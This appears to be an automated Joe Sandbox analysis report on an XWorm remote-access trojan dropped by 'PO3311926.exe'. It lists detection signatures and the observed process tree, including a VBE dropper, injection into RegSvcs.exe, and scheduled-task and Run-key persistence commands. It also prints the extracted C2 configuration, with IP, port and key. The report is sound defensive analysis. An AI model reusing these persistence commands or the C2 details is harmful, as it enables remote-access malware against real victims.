Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO3311926.exe

Overview

General Information

Sample name:PO3311926.exe
Analysis ID:1433216
MD5:543e7940dd0ac8e9e42c0120515ec6b6
SHA1:6dca4a5e851e1ccae98afba16d01a5f9b9553c59
SHA256:c1bf9e8d217baf7a33931f25d96ff9eab4c24f9702beaa41a91bcab3745a1875
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected XWorm
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • PO3311926.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\PO3311926.exe" MD5: 543E7940DD0AC8E9E42C0120515EC6B6)
    • wscript.exe (PID: 6756 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2292 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 2944 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 6052 cmdline: "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sdadbtvsh.bin (PID: 3232 cmdline: sdadbtvsh.bin nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)
          • RegSvcs.exe (PID: 4080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • schtasks.exe (PID: 4932 cmdline: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5652 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3280 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • RegSvcs.exe (PID: 5744 cmdline: C:\Users\user\AppData\Roaming\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sdadbtvsh.bin.exe (PID: 6064 cmdline: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)
    • RegSvcs.exe (PID: 1036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • RegSvcs.exe (PID: 4692 cmdline: "C:\Users\user\AppData\Roaming\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • RegSvcs.exe (PID: 2160 cmdline: C:\Users\user\AppData\Roaming\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sdadbtvsh.bin.exe (PID: 5308 cmdline: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)
    • RegSvcs.exe (PID: 6916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • RegSvcs.exe (PID: 2940 cmdline: "C:\Users\user\AppData\Roaming\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • chrome.exe (PID: 2688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • sdadbtvsh.bin.exe (PID: 5924 cmdline: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)
    • RegSvcs.exe (PID: 6444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • RegSvcs.exe (PID: 3672 cmdline: C:\Users\user\AppData\Roaming\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 2512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["102.165.14.26"], "Port": "5007", "Aes key": "5007", "Install file": "USB.exe", "Version": "XWorm V2.1"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\wrse\nngqrvwq.xlJoeSecurity_AutoitInjectorYara detected Autoit InjectorJoe Security
    C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xlJoeSecurity_AutoitInjectorYara detected Autoit InjectorJoe Security
      SourceRuleDescriptionAuthorStrings
      00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AutoitInjectorYara detected Autoit InjectorJoe Security
                Click to see the 38 entries
                SourceRuleDescriptionAuthorStrings
                21.2.RegSvcs.exe.500000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      8.3.sdadbtvsh.bin.17b6130.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Roaming\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Roaming\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Roaming\RegSvcs.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\RegSvcs.exe, ProcessId: 5744, ProcessName: RegSvcs.exe
                          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2292, ProcessName: cmd.exe
                          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2292, ProcessName: cmd.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\RegSvcs.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvcs
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 4080, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe", ProcessId: 4932, ProcessName: schtasks.exe
                          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl, CommandLine: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl, CommandLine|base64offset|contains: , Image: C:\Users\user\wrse\sdadbtvsh.bin.exe, NewProcessName: C:\Users\user\wrse\sdadbtvsh.bin.exe, OriginalFileName: C:\Users\user\wrse\sdadbtvsh.bin.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl, ProcessId: 6064, ProcessName: sdadbtvsh.bin.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\wrse\SDADBT~1.EXE C:\Users\user\wrse\nngqrvwq.xl, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin, ProcessId: 3232, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                          No Snort rule has matched

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpackMalware Configuration Extractor: Xworm {"C2 url": ["102.165.14.26"], "Port": "5007", "Aes key": "5007", "Install file": "USB.exe", "Version": "XWorm V2.1"}
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binReversingLabs: Detection: 26%
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binVirustotal: Detection: 27%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exeReversingLabs: Detection: 26%
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exeVirustotal: Detection: 27%Perma Link
                          Source: C:\Users\user\wrse\sdadbtvsh.binReversingLabs: Detection: 26%
                          Source: C:\Users\user\wrse\sdadbtvsh.binVirustotal: Detection: 27%Perma Link
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeReversingLabs: Detection: 26%
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeVirustotal: Detection: 27%Perma Link
                          Source: PO3311926.exeReversingLabs: Detection: 68%
                          Source: PO3311926.exeVirustotal: Detection: 55%Perma Link
                          Source: PO3311926.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49705 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49729 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49730 version: TLS 1.2
                          Source: PO3311926.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PO3311926.exe
                          Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
                          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BAA69B
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BBC220
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BCB348 FindFirstFileExA,0_2_00BCB348
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_005FE387
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_005FD836
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_005FDB69
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00609F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00609F9F
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_0060A0FA
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_0060A488
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_006065F1 FindFirstFileW,FindNextFileW,FindClose,8_2_006065F1
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005CC642 FindFirstFileExW,8_2_005CC642
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00607248 FindFirstFileW,FindClose,8_2_00607248
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_006072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_006072E9
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ACE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_00ACE387
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ACD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00ACD836
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00AD9F9F
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ADA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00ADA0FA
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ADA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_00ADA488
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD65F1 FindFirstFileW,FindNextFileW,FindClose,20_2_00AD65F1
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A9C642 FindFirstFileExW,20_2_00A9C642
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_00AD72E9
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AD7248 FindFirstFileW,FindClose,20_2_00AD7248
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ACDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00ACDB69

                          Networking

                          barindex
                          Source: Malware configuration extractorURLs: 102.165.14.26
                          Source: global trafficTCP traffic: 192.168.2.8:49708 -> 102.165.14.26:5007
                          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                          Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
                          Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
